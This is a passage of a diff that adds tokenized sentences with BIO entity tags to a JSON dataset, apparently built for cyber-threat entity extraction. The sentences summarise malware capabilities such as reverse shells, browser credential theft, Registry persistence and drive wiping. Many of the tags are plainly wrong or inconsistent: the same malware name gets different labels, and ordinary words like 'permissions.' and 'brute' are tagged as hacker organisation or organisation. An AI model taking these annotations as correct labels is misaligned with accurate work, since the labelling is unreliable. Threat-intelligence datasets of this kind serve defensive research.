"B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "has", + "a", + "command", + "to", + "timestop", + "a", + "file", + "or", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "uses", + "incoming", + "HTTP", + "requests", + "with", + "a", + "username", + "keyword", + "and", + "commands", + "and", + "handles", + "them", + "as", + "instructions", + "to", + "perform", + "actions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OwaAuth", + "is", + "a", + "Web", + "shell", + "that", + "appears", + "to", + "be", + "exclusively", + "used", + "by", + "Threat", + "Group-3390.", + "It", + "is", + "installed", + "as", + "an", + "ISAPI", + "filter", + "on", + "Exchange", + "servers", + "and", + "shares", + "characteristics", + "with", + "the", + "China", + "Chopper", + "Web", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "has", + "the", + "ability", + "to", + "create", + "reverse", + "shells", + "with", + "Perl", + "scripts." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "has", + "the", + "ability", + "to", + "list", + "and", + "extract", + "data", + "from", + "SQL", + "databases." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "has", + "the", + "ability", + "to", + "copy", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "use", + "a", + "decryption", + "mechanism", + "to", + "process", + "a", + "user", + "supplied", + "password", + "and", + "allow", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "delete", + "scripts", + "from", + "a", + "subdirectory", + "of", + "/tmp", + "after", + "they", + "are", + "run." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "has", + "the", + "ability", + "to", + "list", + "files", + "and", + "file", + "characteristics", + "including", + "extension,", + "size,", + "ownership,", + "and", + "permissions." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "has", + "the", + "ability", + "to", + "modify", + "file", + "permissions." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "display", + "the", + "/etc/passwd", + "file", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "scan", + "networks", + "for", + "open", + "ports", + "and", + "listening", + "services." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "use", + "encryption", + "and", + "base64", + "encoding", + "to", + "hide", + "strings", + "and", + "to", + "enforce", + "access", + "control", + "once", + "deployed." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "use", + "predefined", + "users", + "and", + "passwords", + "to", + "execute", + "brute", + "force", + "attacks", + "against", + "SSH,", + "FTP,", + "POP3,", + "MySQL,", + "MSSQL,", + "and", + "PostgreSQL", + "services." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "B-Way", + "B-Idus", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "list", + "PHP", + "server", + "configuration", + "details." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "issue", + "commands", + "via", + "HTTP", + "POST." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "P.A.S.", + "Webshell", + "can", + "gain", + "remote", + "access", + "and", + "execution", + "on", + "target", + "web", + "servers." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P2P", + "ZeuS", + "added", + "junk", + "data", + "to", + "outgoing", + "UDP", + "packets", + "to", + "peer", + "implants." + ], + "ner_tags": [ + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P8RAT", + "can", + "download", + "additional", + "payloads", + "to", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P8RAT", + "can", + "send", + "randomly-generated", + "data", + "as", + "part", + "of", + "its", + "C2", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P8RAT", + "can", + "check", + "for", + "specific", + "processes", + "associated", + "with", + "virtual", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P8RAT", + "can", + "check", + "the", + "compromised", + "host", + "for", + "processes", + "associated", + "with", + "VMware", + "or", + "VirtualBox", + "environments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "P8RAT", + "has", + "the", + "ability", + "to", + "\"sleep\"", + "for", + "a", + "specified", + "time", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PACEMAKER", + "can", + "enter", + "a", + "loop", + "to", + "read", + "`/proc/`", + "entries", + "every", + "2", + "seconds", + "in", + "order", + "to", + "read", + "a", + "target", + "application's", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PACEMAKER", + "can", + "parse", + "`/proc/\"process_name\"/cmdline`", + "to", + "look", + "for", + "the", + "string", + "`dswsd`", + "within", + "the", + "command", + "line." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PACEMAKER", + "has", + "written", + "extracted", + "data", + "to", + "`tmp/dsserver-check.statementcounters`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PACEMAKER", + "has", + "the", + "ability", + "to", + "extract", + "credentials", + "from", + "OS", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PACEMAKER", + "can", + "use", + "PTRACE", + "to", + "attach", + "to", + "a", + "targeted", + "process", + "to", + "read", + "process", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PACEMAKER", + "can", + "use", + "a", + "simple", + "bash", + "script", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PHOREAL", + "is", + "capable", + "of", + "manipulating", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PHOREAL", + "communicates", + "via", + "ICMP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PHOREAL", + "is", + "capable", + "of", + "creating", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PITSTOP", + "has", + "the", + "ability", + "to", + "communicate", + "over", + "TLS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PITSTOP", + "can", + "deobfuscate", + "base64", + "encoded", + "and", + "AES", + "encrypted", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PITSTOP", + "can", + "listen", + "over", + "the", + "Unix", + "domain", + "socket", + "located", + "at", + "`/data/runtime/cockpit/wd.fd`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PITSTOP", + "can", + "listen", + "and", + "evaluate", + "incoming", + "commands", + "on", + "the", + "domain", + "socket,", + "created", + "by", + "PITHOOK", + "malware,", + "located", + "at", + "`/data/runtime/cockpit/wd.fd`", + "for", + "a", + "predefined", + "magic", + "byte", + "sequence.", + "PITSTOP", + "can", + "then", + "duplicate", + "the", + "socket", + "for", + "further", + "communication", + "over", + "TLS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PITSTOP", + "has", + "the", + "ability", + "to", + "receive", + "shell", + "commands", + "over", + "a", + "Unix", + "domain", + "socket." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "older", + "variant", + "of", + "PLAINTEE", + "performs", + "UAC", + "bypass." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "has", + "downloaded", + "and", + "executed", + "additional", + "plugins." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "uses", + "<code>reg", + "add</code>", + "to", + "add", + "a", + "Registry", + "Run", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "performs", + "the", + "<code>tasklist</code>", + "command", + "to", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "gains", + "persistence", + "by", + "adding", + "the", + "Registry", + "key", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PLAINTEE", + "encodes", + "C2", + "beacons", + "using", + "XOR." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PLAINTEE", + "collects", + "general", + "system", + "enumeration", + "data", + "about", + "the", + "infected", + "machine", + "and", + "checks", + "the", + "OS", + "version." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "uses", + "the", + "<code>ipconfig", + "/all</code>", + "command", + "to", + "gather", + "the", + "victim’s", + "IP", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLAINTEE", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "list", + "open", + "windows", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "steal", + "saved", + "passwords", + "from", + "Microsoft", + "Outlook." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "can", + "harvest", + "saved", + "credentials", + "from", + "browsers", + "such", + "as", + "Google", + "Chrome,", + "Microsoft", + "Internet", + "Explorer,", + "and", + "Mozilla", + "Firefox." + ], + "ner_tags": [ + "B-Org", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "delete", + "files", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "list", + "drives", + "and", + "files", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files", + "to", + "and", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "samples", + "were", + "found", + "to", + "be", + "highly", + "obfuscated", + "with", + "junk", + "code." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "been", + "executed", + "via", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "been", + "executed", + "via", + "malicious", + "links", + "in", + "e-mails." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PLEAD", + "can", + "use", + "`ShellExecute`", + "to", + "execute", + "applications." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "list", + "processes", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "proxy", + "network", + "communications." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "used", + "RC4", + "encryption", + "to", + "download", + "modules." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "used", + "HTTP", + "for", + "communications", + "with", + "command", + "and", + "control", + "(C2)", + "servers." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PLEAD", + "has", + "the", + "ability", + "to", + "execute", + "shell", + "commands", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "has", + "used", + "AOL", + "Instant", + "Messenger", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "has", + "been", + "delivered", + "through", + "compromised", + "sites", + "acting", + "as", + "watering", + "holes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "can", + "conduct", + "file", + "browsing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "can", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "can", + "perform", + "screen", + "capturing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POORAIM", + "can", + "identify", + "system", + "information,", + "including", + "battery", + "status." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "encrypts", + "C2", + "traffic", + "with", + "AES", + "and", + "RSA." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "POSHSPY", + "uploads", + "data", + "in", + "2048-byte", + "chunks." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "uses", + "a", + "DGA", + "to", + "derive", + "command", + "and", + "control", + "URLs", + "from", + "a", + "word", + "list." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "downloads", + "and", + "executes", + "additional", + "PowerShell", + "code", + "and", + "Windows", + "binaries." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "appends", + "a", + "file", + "signature", + "header", + "(randomly", + "selected", + "from", + "six", + "file", + "types)", + "to", + "encrypted", + "data", + "prior", + "to", + "upload", + "or", + "download." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "uses", + "PowerShell", + "to", + "execute", + "various", + "commands,", + "one", + "to", + "execute", + "its", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POSHSPY", + "modifies", + "timestamps", + "of", + "all", + "downloaded", + "executables", + "to", + "match", + "a", + "randomly", + "selected", + "file", + "created", + "prior", + "to", + "2013." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "POSHSPY", + "uses", + "a", + "WMI", + "event", + "subscription", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSOURCE", + "uses", + "DNS", + "TXT", + "records", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSOURCE", + "has", + "been", + "observed", + "being", + "used", + "to", + "download", + "TEXTMATE", + "and", + "the", + "Cobalt", + "Strike", + "Beacon", + "payload", + "onto", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "victim", + "is", + "using", + "PowerShell", + "3.0", + "or", + "later,", + "POWERSOURCE", + "writes", + "its", + "decoded", + "payload", + "to", + "an", + "alternate", + "data", + "stream", + "(ADS)", + "named", + "kernel32.dll", + "that", + "is", + "saved", + "in", + "<code>%PROGRAMDATA%\\Windows\\</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "POWERSOURCE", + "is", + "a", + "PowerShell", + "backdoor." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "POWERSOURCE", + "queries", + "Registry", + "keys", + "in", + "preparation", + "for", + "setting", + "Run", + "keys", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSOURCE", + "achieves", + "persistence", + "by", + "setting", + "a", + "Registry", + "Run", + "key,", + "with", + "the", + "path", + "depending", + "on", + "whether", + "the", + "victim", + "account", + "has", + "user", + "or", + "administrator", + "access." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "encrypted", + "C2", + "traffic", + "with", + "RSA." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "used", + "useless", + "code", + "blocks", + "to", + "counter", + "analysis." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "uses", + "character", + "replacement,", + "PowerShell", + "environment", + "variables,", + "and", + "XOR", + "encoding", + "to", + "obfuscate", + "code.", + "POWERSTATS's", + "backdoor", + "code", + "is", + "a", + "multi-layer", + "obfuscated,", + "encoded,", + "and", + "compressed", + "blob.", + "POWERSTATS", + "has", + "used", + "PowerShell", + "code", + "with", + "custom", + "string", + "obfuscation" + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "DCOM", + "(targeting", + "the", + "127.0.0.1", + "loopback", + "address)", + "to", + "execute", + "additional", + "payloads", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "upload", + "files", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "deobfuscate", + "the", + "main", + "backdoor", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "disable", + "Microsoft", + "Office", + "Protected", + "View", + "by", + "changing", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "DDE", + "to", + "execute", + "additional", + "payloads", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "connected", + "to", + "C2", + "servers", + "through", + "proxies." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "delete", + "all", + "files", + "on", + "the", + "C:\\,", + "D:\\,", + "E:\\", + "and,", + "F:\\", + "drives", + "using", + "PowerShell", + "Remove-Item", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "retrieve", + "and", + "execute", + "additional", + "PowerShell", + "payloads", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "JavaScript", + "code", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "retrieve", + "usernames", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "created", + "a", + "scheduled", + "task", + "named", + "\"MicrosoftEdge\"", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "can", + "use", + "Mshta.exe", + "to", + "execute", + "additional", + "payloads", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "uses", + "PowerShell", + "for", + "obfuscation", + "and", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POWERSTATS", + "has", + "used", + "<code>get_tasklist</code>", + "to", + "discover", + "processes", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ 